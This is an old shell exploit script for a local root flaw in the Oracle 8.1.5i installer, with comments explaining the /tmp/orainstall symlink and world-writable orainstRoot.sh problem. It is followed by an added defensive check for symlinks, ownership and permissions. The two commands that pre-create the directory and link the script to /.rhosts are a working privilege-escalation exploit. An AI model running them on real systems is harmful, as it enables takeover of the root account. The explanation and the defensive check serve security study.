#!/bin/sh
#
# A vulnerability exists in the installation program
# for Oracle 8.1.5i. The Oracle installation scripts
# will create a directory named /tmp/orainstall,
# owned by oracle:dba, mode 711. Inside of this
# directory it will create a shell script named
# orainstRoot.sh, mode 777. The installation script
# will then stop and ask the person installing to
# run this script. The installation program at no
# point attempts to determine if the directory or
# script already exist. This makes it possible
# to create a symbolic link from the orainstRoot.sh
# file to elsewhere on the file system. This could
# be used to create a .rhosts file, for instance,
# and gain access to the root account. In addition,
# since the orainstRoot.sh file is mode 777, it is
# possible for any user on the machine to edit this
# script to execute arbitrary commands when run by
# root. Again, this can result in the compromise of
# the root account.
#
# It is not readily apparent what version of Oracle
# this does and does not affect. It has been
# confirmed on Oracle 8.1.5i, on the Linux/Intel
# platform. It is likely that this vulnerability
# may exist in other versions, and on other
# platforms. If you have any information about
# this, please mail us at: vuldb@securityfocus.com.

mkdir /tmp/orainstall
ln -sf /.rhosts /tmp/orainstall/orainstRoot.sh

# www.hack.co.za
#
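
A defensive counterpart to the flaw described in the comments above, added here as an example and not part of the original script or of Oracle's installer: a check an administrator can run before executing, as root, a script staged in a shared directory such as /tmp/orainstall. The function names check_object and check_staged_script and the expected-owner argument are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example: verify a staged script before running it as root.
# check_object and check_staged_script are hypothetical helper names.

# Succeeds only if $1 is a real (non-symlink) object of kind $2
# ("d" = directory, "f" = regular file), owned by user $3, and
# not writable by group or other.
check_object() {
    obj=$1 kind=$2 owner=$3
    if [ -L "$obj" ]; then
        echo "refusing: $obj is a symbolic link" >&2; return 1
    fi
    case $kind in
        d) [ -d "$obj" ] ;;
        f) [ -f "$obj" ] ;;
        *) false ;;
    esac || { echo "refusing: $obj is missing or of the wrong type" >&2; return 1; }
    # find prints the path only when the ownership test matches.
    if [ -z "$(find "$obj" -prune -user "$owner")" ]; then
        echo "refusing: $obj is not owned by $owner" >&2; return 1
    fi
    # Mode 777, as used for orainstRoot.sh, fails this test.
    if [ -n "$(find "$obj" -prune \( -perm -0020 -o -perm -0002 \))" ]; then
        echo "refusing: $obj is group- or world-writable" >&2; return 1
    fi
    return 0
}

# Check the staging directory first, then the script inside it.
# A directory pre-created by another user fails the ownership test,
# which is the case the installer never looked for.
check_staged_script() {
    script=$1 owner=$2
    check_object "$(dirname "$script")" d "$owner" &&
        check_object "$script" f "$owner"
}
```

Run it as `check_staged_script /tmp/orainstall/orainstRoot.sh oracle && sh /tmp/orainstall/orainstRoot.sh`; the check is only meaningful when the directory test passes, since whoever owns the directory can replace the file between the check and the run.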